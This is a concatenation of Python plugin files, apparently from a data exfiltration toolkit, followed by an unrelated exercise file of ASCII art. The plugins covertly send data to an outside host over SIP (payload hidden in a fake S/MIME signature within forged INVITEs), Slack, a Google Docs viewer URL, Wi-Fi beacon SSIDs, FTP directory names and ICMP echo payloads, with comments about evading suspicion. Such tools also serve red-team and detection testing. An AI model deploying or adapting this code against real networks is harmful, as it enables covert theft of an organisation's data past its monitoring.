names = ('alice', 'bob', 'eve', 'kim', 'lorrie', 'ben')
# Pick two distinct personas for this process's fake call, once at import time.
caller, callee = random.sample(names, 2)
#proxy = "freephonie.net" #Might as well be internal PBX
#domain = 'e.corp'
#domain = 'e.corp'
class UserAgent:
    """Identity of one SIP endpoint (alias@ip) used when forging dialog headers."""

    def __init__(self, alias, ip, port=None, user_agent=None):
        self.alias = alias
        self.ip = ip
        self.port = port
        # BUG FIX: the passed-in user_agent was previously discarded and always
        # overwritten with the Linphone default, so a replayed request's UA
        # string (see SIPDialog.init_from_request) was lost. Keep it when given.
        self.user_agent = user_agent or 'Linphone/3.6.1 (eXosip2/4.1.0)'
        # Random 10-digit SIP "tag" parameter for this endpoint.
        self.tag = ''.join(random.sample(string.digits, 10))
class SIPDialog:
    """Forges both sides of a SIP call whose INVITE smuggles a payload inside
    a fake S/MIME signature body part (multipart/signed)."""
    def __init__(self, uac=None, uas=None, proxy=None):
        # Random numeric Call-ID, and a branch with the RFC 3261 magic
        # cookie prefix "z9hG4bK" so it looks like a compliant stack.
        self.call_id = ''.join(random.sample(string.digits, 8))
        self.uac = uac
        self.uas = uas
        self.branch = 'z9hG4bK' + ''.join(random.sample(string.digits, 10))
        self.proxy = proxy
        self.subject = "Phone call"
    def init_from_request(self, req):
        # Populate this dialog's fields by parsing a received INVITE's
        # From/Via/To headers (used on the listening side).
        self.call_id = req.headers['call-id']
        parser = re.compile('<sip:(.*)@(.*)>;tag=(.*)')
        [(s_alias, s_ip, tag)] = re.findall(parser, req.headers['from'])
        parser = re.compile('SIP\/2\.0\/UDP (.*):(\d*)(?:\;rport.*)?\;branch=(.*)')
        [(proxy, s_port, branch)] = re.findall(parser, req.headers['via'])
        parser = re.compile('<sip:(.*)@(.*)>')
        [(c_alias, c_ip)] = re.findall(parser, req.headers['to'])
        user_agent = req.headers['user-agent']
        self.tag = tag
        self.branch = branch
        # Roles are mirrored: the remote caller becomes our uas, we answer as uac.
        self.uac = UserAgent(c_alias, c_ip)
        self.uas = UserAgent(s_alias, s_ip, port=s_port, user_agent=user_agent)
        self.proxy = proxy
    def invite(self, uac, uas, payload):
        # Build the INVITE carrying `payload` base64-encoded as a fake
        # application/x-pkcs7-signature attachment. The "42" markers planted
        # in Call-ID and branch let the listener recognise exfiltration calls.
        #Call-ID magic identifier
        self.call_id = self.call_id[:3] + "42" + self.call_id[5:]
        #Branch magic identifier
        self.branch = self.branch[:11] + "42" + self.branch[13:]
        self.uac = uac
        self.uas = uas
        self.proxy = self.proxy or '127.0.0.1' #keep calm & blame misconfiguration
        packet = sip.Request()
        #forge headers
        packet.uri = 'sip:' + self.uas.alias + '@'+ self.uas.ip
        packet.headers['Via'] = 'SIP/2.0/UDP {}:{};branch={}'.format(self.proxy, self.uac.port, self.branch)
        packet.headers['Max-Forwards'] = 70
        packet.headers['CSeq'] = '20 ' + packet.method
        packet.headers['From'] = '{} <sip:{}@{}>;tag={}'.format(self.uac.alias.capitalize(), self.uac.alias, self.uac.ip, self.uac.tag)
        packet.headers['To'] = '{} <sip:{}@{}>'.format(self.uas.alias.capitalize(), self.uas.alias, self.uas.ip)
        packet.headers['Contact'] = '<sip:{}@{}>'.format(self.uac.alias, self.uac.ip)
        packet.headers['Call-ID'] = self.call_id
        packet.headers['User-Agent'] = self.uac.user_agent
        packet.headers['Subject'] = self.subject
        packet.headers['Content-Type'] = 'application/sdp'
        packet.headers['Allow'] = 'INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, NOTIFY, MESSAGE, SUBSCRIBE, INFO'
        #forge the sdp message
        # Plausible Linphone-style audio/video session description.
        sdp_content = "v=0\r\n"
        sdp_content += "o=" + self.uac.alias + " 99 939 IN IP4 " + self.uac.ip + "\r\n"
        sdp_content += "s=Talk\r\n"
        sdp_content += "c=IN IP4 " + self.uac.ip + "\r\n"
        sdp_content += "t=0 0\r\n"
        sdp_content += "m=audio 7078 RTP/AVP 124 111 110 0 8 101\r\n"
        sdp_content += "a=rtpmap:124 opus/48000\r\n"
        sdp_content += "a=fmtp:124 useinbandfec=1; usedtx=1\r\n"
        sdp_content += "a=rtpmap:111 speex/16000\r\n"
        sdp_content += "a=fmtp:111 vbr=on\r\n"
        sdp_content += "a=rtpmap:110 speex/8000\r\n"
        sdp_content += "a=fmtp:110 vbr=on\r\n"
        sdp_content += "a=rtpmap:101 telephone-event/8000\r\n"
        sdp_content += "a=fmtp:101 0-11\r\n"
        sdp_content += "m=video 9078 RTP/AVP 103 99\r\n"
        sdp_content += "a=rtpmap:103 VP8/90000\r\n"
        sdp_content += "a=rtpmap:99 MP4V-ES/90000\r\n"
        sdp_content += "a=fmtp:99 profile-level-id=3\r\n"
        #forge sdp header
        sdp_hdr = "Content-Type: message/sip\r\n"
        sdp_hdr += "Content-Length: " + str(len(sdp_content)) + '\r\n'
        sdp_hdr += "INVITE sip:{}@{} SIP/2.0".format(self.uas.alias, self.uas.ip)
        sdp_hdr += packet.pack_hdr()
        sdp_hdr += "\r\n"
        #forge the false signature
        # The "signature" part is really the base64 payload in disguise.
        sig = 'Content-Type: application/x-pkcs7-signature; name="smime.p7s"\r\n'
        sig += 'Content-Transfer-Encoding: base64\r\n'
        sig += 'Content-Disposition: attachment; filename="smime.p7s"; handling=required\r\n'
        sig += base64.b64encode(payload)
        #forge sip body
        boundary = ''.join(random.sample(string.digits + string.ascii_letters, 20))
        packet.body = '--' + boundary + '\r\n'
        packet.body += sdp_hdr
        packet.body += sdp_content + '\r\n'
        packet.body += '--' + boundary + '\r\n'
        packet.body += sig + '\r\n'
        packet.body += '--' + boundary + '--'
        #replace sip header content-type with multipart/signed
        packet.headers['Content-Type'] = 'multipart/signed; protocol="application/x-pkcs7-signature"; micalg=sha1; boundary=' + boundary
        #Update Content-Length
        packet.headers['Content-Length'] = str(len(packet.body))
        return packet
    def trying(self, invite):
        # "100 Trying" provisional response echoing the INVITE's routing headers.
        packet = sip.Response()
        packet.status = '100'
        packet.reason = 'Trying'
        packet.headers['Via'] = invite.headers['via']
        packet.headers['From'] = invite.headers['from']
        packet.headers['To'] = invite.headers['to']
        packet.headers['Call-ID'] = invite.headers['call-id']
        packet.headers['CSeq'] = invite.headers['cseq']
        packet.headers['User-Agent'] = self.uac.user_agent
        packet.headers['Content-Length'] = '0'
        return packet
    def ringing(self, invite):
        # "180 Ringing" provisional response; adds our tag to the To header.
        packet = sip.Response()
        packet.status = '180'
        packet.reason = 'Ringing'
        packet.headers['Via'] = invite.headers['via']
        packet.headers['From'] = invite.headers['from']
        packet.headers['To'] = invite.headers['to'] + ';tag={}'.format(self.uac.tag)
        packet.headers['Call-ID'] = invite.headers['call-id']
        packet.headers['CSeq'] = invite.headers['cseq']
        packet.headers['Contact'] = '<sip:{}@{}>'.format(self.uac.alias, self.uac.ip)
        packet.headers['User-Agent'] = self.uac.user_agent
        packet.headers['Content-Length'] = '0'
        return packet
    def decline(self, invite):
        # "603 Decline" final response -- the call is never actually answered.
        packet = sip.Response()
        packet.status = '603'
        packet.reason = 'Decline'
        packet.headers['From'] = invite.headers['from']
        packet.headers['To'] = invite.headers['to'] + ';tag={}'.format(self.uac.tag)
        packet.headers['Call-ID'] = invite.headers['call-id']
        packet.headers['CSeq'] = invite.headers['cseq']
        packet.headers['User-Agent'] = self.uac.user_agent
        packet.headers['Content-Length'] = '0'
        return packet
    def ack(self, message):
        # ACK the final response so the exchange looks like a complete dialog.
        packet = sip.Request()
        packet.method = 'ACK'
        packet.uri = 'sip:{}@{}'.format(self.uas.alias, self.uas.ip)
        packet.headers['Via'] = message.headers['via']
        packet.headers['From'] = message.headers['from']
        packet.headers['To'] = message.headers['to']
        packet.headers['Call-ID'] = message.headers['call-id']
        packet.headers['CSeq'] = '20 ACK'
        packet.headers['Content-Length'] = '0'
        return packet
def listen():
    # Server side: answer every incoming INVITE like a real softphone
    # (Trying -> Ringing -> Decline), and extract the payload from INVITEs
    # that carry the exfiltration magic markers.
    app_exfiltrate.log_message('info', "[sip] Listening for incoming calls")
    port = config['port']
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind(('', port))
    while True:
        data, addr = sock.recvfrom(65535)
        try:
            req = sip.Request()
            req.unpack(data)
            if req.method == 'INVITE':
                dialog = SIPDialog()
                dialog.init_from_request(req)
                #Simulate legit softphone responses
                trying = dialog.trying(req)
                sock.sendto(trying.pack(), addr)
                ringing = dialog.ringing(req)
                sock.sendto(ringing.pack(), addr)
                decline = dialog.decline(req)
                sock.sendto(decline.pack(), addr)
                #Check if the request is part of exfiltration job
                # "42" markers are planted by SIPDialog.invite() in the branch
                # and Call-ID of forged requests.
                if dialog.branch[11:13] == "42" and dialog.call_id[3:5] == "42":
                    parser = re.compile('boundary=(.*)')
                    [boundary] = re.findall(parser, req.headers['content-type'])
                    #Hackish payload isolation
                    # second-to-last multipart section, second-to-last CRLF line
                    # = the base64 blob appended after the fake signature headers.
                    payload = req.body.split('--'+boundary)[-2].split('\r\n')[-2]
                    app_exfiltrate.log_message('info', "[sip] Received {0} bytes from {1}".format(len(payload), addr[0]))
                    app_exfiltrate.retrieve_data(base64.b64decode(payload))
        except Exception as e:
            print(traceback.format_exc())
            print('exception: ' + repr(e))
            pass
def send(data):
    """Wrap *data* in a fake SIP INVITE and fire it at the target (or a proxy).

    Waits for the listener's 603 Decline, ACKs it to complete the handshake,
    then returns.  NOTE: dict.has_key() is Python 2 only.
    """
    if config.has_key('proxies') and config['proxies'] != [""]:
        # Pick a random hop among the target and any configured proxies.
        targets = [config['target']] + config['proxies']
        target = choice(targets)
    else:
        target = config['target']
    port = config['port']
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind(('', port))
    dialog = SIPDialog()
    laddr = socket.gethostbyname(socket.getfqdn())
    uac = UserAgent(caller, laddr, port=port)
    uas = UserAgent(callee, target, port=port)
    invite = dialog.invite(uac, uas, data)
    app_exfiltrate.log_message('info', "[sip] Sending {0} bytes to {1}".format(len(data), target))
    sock.sendto(invite.pack(), (target, port))
    while True:
        try:
            recv_data, addr = sock.recvfrom(65535)
            response = sip.Response()
            response.unpack(recv_data)
            if response.reason == 'Decline':
                # Complete the transaction so it looks like a real call.
                ack = dialog.ack(response)
                sock.sendto(ack.pack(), (target, port))
                sock.close()
                break
            else:
                continue
        except:
            pass
        # Reached only after an exception: stop waiting for the Decline.
        break
def proxy():
    """Relay SIP datagrams bidirectionally between the original sender and the target.

    The first datagram not coming from the target identifies the sender;
    thereafter traffic from the target goes back to that sender and
    everything else is forwarded to the target.
    """
    app_exfiltrate.log_message('info', "[proxy] [sip] Starting SIP proxy")
    target = config['target']
    port = config['port']
    sender = ""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind(('', port))
    while True:
        data, addr = sock.recvfrom(65535)
        if addr[0] != target:
            # Remember the most recent non-target peer as the return path.
            sender = addr[0]
        try:
            if addr[0] == target:
                app_exfiltrate.log_message('info', "[proxy] [sip] Relaying data to {0}".format(target))
                sock.sendto(data, (sender, port))
            else:
                app_exfiltrate.log_message('info', "[proxy] [sip] Relaying data to {0}".format(sender))
                sock.sendto(data, (target, port))
        except:
            print(traceback.format_exc())
class Plugin:
    """Hooks the SIP transport's send/listen/proxy callbacks into the framework."""

    def __init__(self, app, conf):
        global app_exfiltrate, config
        app_exfiltrate = app
        config = conf
        handlers = {'send': send, 'listen': listen, 'proxy': proxy}
        app.register_plugin('sip', handlers)
|
NickFleece/DET | plugins/slack.py | from slackclient import SlackClient
import time
app_exfiltrate = None
config = None
sc = None
def send(data):
    """Post *data* (hex-encoded) as a Slack message in the configured channel.

    NOTE: str.encode('hex') is Python 2 only.
    """
    global sc
    chan = config['chan_id']
    app_exfiltrate.log_message('info', "[slack] Sending {} bytes with Slack".format(len(data)))
    data = data.encode('hex')
    # NOTE(review): "api.text" is not a documented Slack API method — this
    # call looks vestigial; confirm whether it can be removed.
    sc.api_call("api.text")
    sc.api_call("chat.postMessage", as_user="true:", channel=chan, text=data)
def listen():
    """Poll the Slack RTM stream and hex-decode any message text as exfil data.

    NOTE: str.decode('hex') is Python 2 only.
    """
    app_exfiltrate.log_message('info', "[slack] Listening for messages")
    if sc.rtm_connect():
        while True:
            try:
                # Only the first event of each poll batch is inspected.
                raw_data = sc.rtm_read()[0]
                if 'text' in raw_data:
                    app_exfiltrate.log_message('info', "[slack] Receiving {} bytes with Slack".format(len(raw_data['text'])))
                    app_exfiltrate.retrieve_data(raw_data['text'].decode('hex'))
            except:
                pass
            time.sleep(1)
    else:
        app_exfiltrate.log_message('warning', "Connection Failed, invalid token?")
def proxy():
    """Proxy mode is pointless for Slack (the service itself relays); just log it."""
    message = "[proxy] [slack] proxy mode unavailable (useless) for Slack plugin"
    app_exfiltrate.log_message('info', message)
class Plugin:
    """Wires the Slack transport into the framework using the configured API token."""

    def __init__(self, app, conf):
        global app_exfiltrate, config, sc
        sc = SlackClient(conf['api_token'])
        config = conf
        handlers = {'send': send, 'listen': listen, 'proxy': proxy}
        app.register_plugin('slack', handlers)
        app_exfiltrate = app
|
NickFleece/DET | plugins/google_docs.py | <filename>plugins/google_docs.py
import requests
import base64
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
import urllib
config = None
app_exfiltrate = None
def send(data):
    """Smuggle *data* via the Google Docs viewer: the payload rides in the
    'url' query parameter, so Google's servers fetch it from the listener.

    NOTE: urllib.quote_plus is the Python 2 location (urllib.parse in 3).
    """
    target = "https://docs.google.com/viewer?url=http://{}:{}/{}".format(config['target'], config['port'], urllib.quote_plus(base64.b64encode(data)))
    app_exfiltrate.log_message(
        'info', "[http] Sending {0} bytes to {1}".format(len(data), target))
    requests.get(target)
def listen():
    """Listen mode is not supported by the Google Docs transport; log and return."""
    message = "[Google docs] Listen mode not implemented"
    app_exfiltrate.log_message('info', message)
def proxy():
    """Proxy mode is not supported by the Google Docs transport; log and return."""
    message = "[proxy] [Google docs] proxy mode not implemented"
    app_exfiltrate.log_message('info', message)
class Plugin:
    """Registers the Google Docs transport's callbacks with the framework."""

    def __init__(self, app, conf):
        global app_exfiltrate, config
        config = conf
        app_exfiltrate = app
        handlers = {'send': send, 'listen': listen, 'proxy': proxy}
        app.register_plugin('google_docs', handlers)
|
NickFleece/DET | plugins/wifi.py | from __future__ import print_function
try:
from scapy.all import *
except:
print("You should install Scapy if you run the server..")
config = None
app_exfiltrate = None
ap_list = []
ap_buffer = []
job_id = None
def PacketHandler(pkt):
    """Reassemble exfiltrated data broadcast as hex-encoded 802.11 beacon SSIDs.

    Each previously unseen AP's beacon SSID is hex-decoded and appended to
    the module-level ``ap_buffer``; the first 7 decoded characters of the
    first chunk are remembered as the job id.  A short SSID (< 30 chars)
    marks the end of a message and flushes the whole buffer; seeing the job
    id twice means one complete message plus the start of the next.
    NOTE: str.decode('hex') makes this Python 2 only.
    """
    global ap_buffer, job_id
    if pkt.haslayer(Dot11):
        # type 0 / subtype 8 == 802.11 management beacon frame
        if pkt.type == 0 and pkt.subtype == 8:
            if pkt.addr2 not in ap_list:
                ap_list.append(pkt.addr2)
                print("AP MAC: {} with SSID: {}".format(pkt.addr2, pkt.info))
                try:
                    data = pkt.info.decode('hex')
                    if len(ap_buffer) == 0:
                        job_id = data[:7]
                        print("job_id : {}".format(job_id))
                    ap_buffer.append(data)
                    print(ap_buffer)
                    try:
                        data_to_exfil = ''.join(ap_buffer)
                        print("data_to_exfil = {}".format(data_to_exfil))
                        if len(pkt.info) < 30:
                            # Short SSID terminates the message: flush all.
                            data_to_exfil = ''.join(ap_buffer)
                            app_exfiltrate.retrieve_data(data_to_exfil)
                            ap_buffer = []
                        elif data_to_exfil.count(job_id) == 2:
                            packet_exfil = job_id + data_to_exfil.split(job_id)[0]
                            app_exfiltrate.retrieve_data(packet_exfil)
                            # BUG FIX: the original passed '' as str.split's
                            # maxsplit (TypeError, swallowed by the except
                            # below), so the buffer was never trimmed.  Keep
                            # the remainder after the delivered message as
                            # the new buffer contents.
                            ap_buffer = [data_to_exfil.replace(packet_exfil, '', 1)]
                    except Exception as err:
                        print(err)
                        pass
                except Exception as err:
                    print(err)
                    pass
def send(data):
    """Broadcast *data* as a sequence of fake-AP beacon frames.

    The payload is cut into 15-byte chunks, hex-encoded, and used as the
    SSID of a forged beacon with randomized MACs.  NOTE: str.encode('hex')
    is Python 2 only; requires a monitor-mode interface.
    """
    # data = data.encode('hex')
    while data != "":
        tmp = data[:15]
        data = data.replace(tmp, '')
        tmp = tmp.encode('hex')
        app_exfiltrate.log_message('info', "[wifi] Sending {0} on {1}".format(tmp, config['interface']))
        netSSID = tmp #Network name here
        iface = str(config['interface']) #Interface name here
        # Forged beacon frame: random source/BSSID so each chunk looks like
        # a distinct access point.
        dot11 = Dot11(type=0, subtype=8, addr1=RandMAC(),
                      addr2=RandMAC(), addr3=RandMAC())
        beacon = Dot11Beacon(cap='ESS+privacy')
        essid = Dot11Elt(ID='SSID',info=netSSID, len=len(netSSID))
        rsn = Dot11Elt(ID='RSNinfo', info=(
            '\x01\x00'             #RSN Version 1
            '\x00\x0f\xac\x02'     #Group Cipher Suite : 00-0f-ac TKIP
            '\x02\x00'             #2 Pairwise Cipher Suites (next two lines)
            '\x00\x0f\xac\x04'     #AES Cipher
            '\x00\x0f\xac\x02'     #TKIP Cipher
            '\x01\x00'             #1 Authentication Key Managment Suite (line below)
            '\x00\x0f\xac\x02'     #Pre-Shared Key
            '\x00\x00'))           #RSN Capabilities (no extra capabilities)
        frame = RadioTap()/dot11/beacon/essid/rsn
        # frame.show()
        # print("\nHexdump of frame:")
        # hexdump(frame)
        sendp(frame, iface=iface, inter=1)
def listen():
    """Sniff beacons on the configured monitor interface, feeding PacketHandler."""
    print(config['interface'])
    app_exfiltrate.log_message('info', "[wifi] Waiting for Wi-Fi probe on {}".format(config['interface']))
    sniff(iface=str(config['interface']), prn=PacketHandler)
    # sniff(iface="wlan1mon", prn=PacketHandler)
class Plugin:
    """Registers the Wi-Fi beacon transport (no proxy mode) with the framework."""

    def __init__(self, app, conf):
        global config, app_exfiltrate
        config = conf
        app_exfiltrate = app
        handlers = {'send': send, 'listen': listen}
        app.register_plugin('wifi', handlers)
|
NickFleece/DET | plugins/ftp.py | <reponame>NickFleece/DET<gh_stars>100-1000
import logging
from ftplib import FTP
from pyftpdlib.handlers import FTPHandler
from pyftpdlib.servers import FTPServer
from pyftpdlib.authorizers import DummyAuthorizer
from random import choice
import base64
app_exfiltrate = None
config = None
user = "user"
passwd = "<PASSWORD>"
class CustomFTPHandler(FTPHandler):
    """pyftpdlib handler that abuses MKD: the directory name carries the payload.

    The class-level ``handler`` attribute ('retrieve' or 'relay') is set by
    init_ftp() and decides whether decoded data is consumed locally or
    forwarded to the next hop.
    """

    def ftp_MKD(self, path):
        """Intercept MKD, extract the base64 payload from the last path segment."""
        app_exfiltrate.log_message('info', "[ftp] Received MKDIR query from {}".format(self.addr))
        data = str(path).split('/')[-1]
        if self.handler == "retrieve":
            app_exfiltrate.retrieve_data(base64.b64decode(data))
        elif self.handler == "relay":
            relay_ftp_mkdir(data)
        # Recreate behavior of the original ftp_MKD function
        line = self.fs.fs2ftp(path)
        self.respond('257 "%s" directory created.' % line.replace('"', '""'))
        return path
def send(data):
    """Exfiltrate *data* by issuing an FTP MKD with the base64 payload as name.

    NOTE: dict.has_key() is Python 2 only.  Connection/MKD failures are
    deliberately silent (best-effort transport).
    """
    if config.has_key('proxies') and config['proxies'] != [""]:
        # Pick a random hop among the target and any configured proxies.
        targets = [config['target']] + config['proxies']
        target = choice(targets)
    else:
        target = config['target']
    port = config['port']
    try:
        ftp = FTP()
        ftp.connect(target, port)
        ftp.login(user, passwd)
    except:
        pass
    try:
        ftp.mkd(base64.b64encode(data))
    except:
        pass
def relay_ftp_mkdir(data):
    """Forward an already-encoded MKD payload to the configured target (proxy hop)."""
    target = config['target']
    port = config['port']
    app_exfiltrate.log_message('info', "[proxy] [ftp] Relaying MKDIR query to {}".format(target))
    try:
        ftp = FTP()
        ftp.connect(target, port)
        ftp.login(user, passwd)
    except:
        pass
    try:
        # *data* is already base64 — relay verbatim, no re-encoding.
        ftp.mkd(data)
    except:
        pass
def init_ftp(data_handler):
    """Run the embedded FTP server forever; *data_handler* is 'retrieve' or 'relay'."""
    # Silence pyftpdlib's logging by sending it to /dev/null.
    logging.basicConfig(filename="/dev/null", format="", level=logging.INFO)
    port = config['port']
    authorizer = DummyAuthorizer()
    authorizer.add_user(user, passwd, homedir="/tmp", perm='elradfmw')
    handler = CustomFTPHandler
    handler.authorizer = authorizer
    # Class attribute read by CustomFTPHandler.ftp_MKD to choose behavior.
    handler.handler = data_handler
    server = FTPServer(('', port), handler)
    server.serve_forever()
def listen():
    """Run the FTP server in retrieve mode: MKD payloads are decoded locally."""
    mode = "retrieve"
    app_exfiltrate.log_message('info', "[ftp] Listening for FTP requests")
    init_ftp(mode)
def proxy():
    """Run the FTP server in relay mode: MKD payloads are forwarded onward."""
    mode = "relay"
    app_exfiltrate.log_message('info', "[proxy] [ftp] Listening for FTP requests")
    init_ftp(mode)
class Plugin:
    """Registers the FTP transport's send/listen/proxy callbacks with the framework."""

    def __init__(self, app, conf):
        global app_exfiltrate, config
        app_exfiltrate = app
        config = conf
        handlers = {'send': send, 'listen': listen, 'proxy': proxy}
        app.register_plugin('ftp', handlers)
|
NickFleece/DET | plugins/icmp.py | <gh_stars>100-1000
import base64
import socket
from random import choice, randint
from dpkt import ip, icmp
config = None
app_exfiltrate = None
def send_icmp(dst, data):
    """Send *data* as the payload of a single ICMP echo request to *dst*.

    Requires root privileges (raw socket).  Exits the process if the raw
    socket cannot be created; a failed sendto is logged and ignored.
    """
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)
    except Exception:
        app_exfiltrate.log_message('warning', "ICMP plugin requires root privileges")
        # BUG FIX: the original called sys.exit() without ever importing
        # sys (NameError).  raise SystemExit is exactly what sys.exit does.
        raise SystemExit
    ip_dst = socket.gethostbyname(dst)
    # Build the echo request with a random id so replies can be correlated.
    echo = icmp.ICMP.Echo()
    echo.id = randint(0, 0xffff)
    echo.seq = 1
    echo.data = data
    icmp_pkt = icmp.ICMP()
    icmp_pkt.type = icmp.ICMP_ECHO
    icmp_pkt.data = echo
    try:
        s.sendto(icmp_pkt.pack(), (ip_dst, 0))
    except Exception:
        app_exfiltrate.log_message('warning', "ICMP plugin requires root privileges")
    finally:
        # Always release the raw socket, even when sendto fails.
        s.close()
def send(data):
    """Base64-encode *data* and tunnel it in an ICMP echo request.

    NOTE: dict.has_key() is Python 2 only.
    """
    if config.has_key('proxies') and config['proxies'] != [""]:
        # Pick a random hop among the target and any configured proxies.
        targets = [config['target']] + config['proxies']
        target = choice(targets)
    else:
        target = config['target']
    data = base64.b64encode(data)
    app_exfiltrate.log_message(
        'info', "[icmp] Sending {0} bytes with ICMP packet to {1}".format(len(data), target))
    send_icmp(target, data)
def listen():
    """Sniff inbound ICMP echo requests and hand their payloads to analyze()."""
    app_exfiltrate.log_message('info', "[icmp] Listening for ICMP packets..")
    # Filter for echo requests only to prevent capturing generated replies
    sniff(handler=analyze)
def sniff(handler):
    """ Sniffs packets and looks for icmp requests """
    # Raw ICMP socket: requires root.  Each received datagram is parsed
    # with dpkt and, if it is an echo request, passed to *handler* as
    # (payload, src_ip, dst_ip).
    sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)
    sock.bind(('', 1))
    while True :
        try:
            data = sock.recv(65535)
            ip_pkt = ip.IP()
            ip_pkt.unpack(data)
            icmp_pkt = ip_pkt.data
            if icmp_pkt.type == icmp.ICMP_ECHO:
                ip_src = socket.inet_ntoa(ip_pkt.src)
                ip_dst = socket.inet_ntoa(ip_pkt.dst)
                payload = icmp_pkt.data.data
                handler(payload, ip_src, ip_dst)
        except:
            # NOTE(review): closing inside the infinite loop means the next
            # recv() fails immediately and forever (busy exception loop);
            # a `break` after close looks intended — confirm.
            sock.close()
def analyze(payload, src, dst):
    """Decode an ICMP echo payload (base64) and pass it to the application.

    Malformed payloads (non-base64, e.g. ordinary pings) are silently ignored.
    """
    try:
        app_exfiltrate.log_message(
            'info', "[icmp] Received ICMP packet from {0} to {1}".format(src, dst))
        app_exfiltrate.retrieve_data(base64.b64decode(payload))
    except:
        pass
def relay_icmp_packet(payload, src, dst):
    """Forward a captured echo payload to the configured target (proxy hop).

    The payload stays base64-encoded — it is relayed verbatim.
    """
    target = config['target']
    try:
        app_exfiltrate.log_message(
            'info', "[proxy] [icmp] Relaying icmp packet to {0}".format(target))
        send_icmp(target, payload)
    except:
        pass
def proxy():
    """Run the sniffer in relay mode: captured echo payloads are forwarded on."""
    message = "[proxy] [icmp] Listening for icmp packets"
    app_exfiltrate.log_message('info', message)
    sniff(handler=relay_icmp_packet)
class Plugin:
    """Registers the ICMP transport's send/listen/proxy callbacks with the framework."""

    def __init__(self, app, conf):
        global app_exfiltrate, config
        app_exfiltrate = app
        config = conf
        handlers = {'send': send, 'listen': listen, 'proxy': proxy}
        app.register_plugin('icmp', handlers)
|
dggsoares/Simple_Python_Exercises | python_101/02.2 - ascii_art.py | <gh_stars>1-10
stormtrooper = r'''
,ooo888888888888888oooo,
o8888YYYYYY77iiiiooo8888888o
8888YYYY77iiYY8888888888888888
[88YYY77iiY88888888888888888888]
88YY7iYY888888888888888888888888
[88YYi 88888888888888888888888888]
i88Yo8888888888888888888888888888i
i] ^^^88888888^^^ o [i
oi8 i o8o i 8io
,77788o ^^ ,oooo8888888ooo, ^ o88777,
7777788888888888888888888888888888877777
77777888888888888888888888888888877777
77777788888888^7777777^8888888777777
,oooo888 ooo 88888778888^7777ooooo7777^8887788888 ,o88^^^^888oo
o8888777788[];78 88888888888888888888888888888888888887 7;8^ 888888888oo^88
o888888iii788 ]; o 78888887788788888^;;^888878877888887 o7;[]88888888888888o
88888877 ii78[]8;7o 7888878^ ^8788^;;;;;;^878^ ^878877 o7;8 ]878888888888888
[88888888887888 87;7oo 777888o8888^;ii;;ii;^888o87777 oo7;7[]8778888888888888
88888888888888[]87;777oooooooooooooo888888oooooooooooo77;78]88877i78888888888
o88888888888888 877;7877788777iiiiiii;;;;;iiiiiiiii77877i;78] 88877i;788888888
88^;iiii^88888 o87;78888888888888888888888888888888888887;778] 88877ii;7788888
;;;iiiii7iiii^ 87;;888888888888888888888888888888888888887;778] 888777ii;78888
;iiiii7iiiii7iiii77;i88888888888888888888i7888888888888888877;77i 888877777ii78
iiiiiiiiiii7iiii7iii;;;i7778888888888888ii7788888888888777i;;;;iiii 88888888888
i;iiiiiiiiiiii7iiiiiiiiiiiiiiiiiiiiiiiiii8877iiiiiiiiiiiiiiiiiii877 88888
ii;;iiiiiiiiiiiiii;;;ii^^^;;;ii77777788888888888887777iii;; 77777 78
77iii;;iiiiiiiiii;;;ii;;;;;;;;;^^^^8888888888888888888777ii;; ii7 ;i78
^ii;8iiiiiiii ';;;;ii;;;;;;;;;;;;;;;;;;^^oo ooooo^^^88888888;;i7 7;788
o ^;;^^88888^ 'i;;;;;;;;;;;;;;;;;;;;;;;;;;;^^^88oo^^^^888ii7 7;i788
88ooooooooo ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; 788oo^;; 7;i888
887ii8788888 ;;;;;;;ii;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;^87 7;788
887i8788888^ ;;;;;;;ii;;;;;;;oo;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;,,, ;;888
87787888888 ;;;;;;;ii;;;;;;;888888oo;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;,,;i788
87i8788888^ ';;;ii;;;;;;;8888878777ii8ooo;;;;;;;;;;;;;;;;;;;;;;;;;;i788 7
77i8788888 ioo;;;;;;oo^^ooooo ^7i88^ooooo;;;;;;;;;;;;;;;;;;;;i7888 78
7i87788888o 7;ii788887i7;7;788888ooooo7888888ooo;;;;;;;;;;;;;;oo ^^^ 78
i; 7888888^ 8888^o;ii778877;7;7888887;;7;7788878;878;; ;;;;;;;i78888o ^
i8 788888 [88888^^ ooo ^^^^^;;77888^^^^;;7787^^^^ ^^;;;; iiii;i78888888
^8 7888^ [87888 87 ^877i;i8ooooooo8778oooooo888877ii; iiiiiiii788888888
^^^ [7i888 87;; ^8i;;i7888888888888888887888888 i7iiiiiii88888^^
87;88 o87;;;;o 87i;;;78888788888888888888^^ o 8ii7iiiiii;;
87;i8 877;77888o ^877;;;i7888888888888^^ 7888 78iii7iii7iiii
^87; 877;778888887o 877;;88888888888^ 7ii7888 788oiiiiiiiii
^ 877;7 7888888887 877i;;8888887ii 87i78888 7888888888
[87;;7 78888888887 87i;;888887i 87ii78888 7888888888]
877;7 7788888888887 887i;887i^ 87ii788888 78888888888
87;i8 788888888888887 887ii;;^ 87ii7888888 78888888888
[87;i8 7888888888888887 ^^^^ 87ii77888888 78888888888
87;;78 7888888888888887ii 87i78888888 778888888888
87;788 7888888888888887i] 87i78888888 788888888888
[87;88 778888888888888887 7ii78888888 788888888888
87;;88 78888888888888887] ii778888888 78888888888]
7;;788 7888888888888888] i7888888888 78888888888'
7;;788 7888888888888888 'i788888888 78888888888
7;i788 788888888888888] 788888888 77888888888]
'7;788 778888888888888] [788888888 78888888888'
';77888 78888888888888 8888888888 7888888888]
778888 78888888888888 8888888888 7888888888]
78888 7888888888888] [8888888888 7888888888
7888 788888888888] 88888888888 788888888]
778 78888888888] ]888888888 778888888]
oooooo ^88888^ ^88888^^^^^^^^8888]
87;78888ooooooo8o ,oooooo oo888oooooo
[877;i77888888888] [;78887i8888878i7888;
^877;;ii7888ii788 ;i777;7788887787;778;
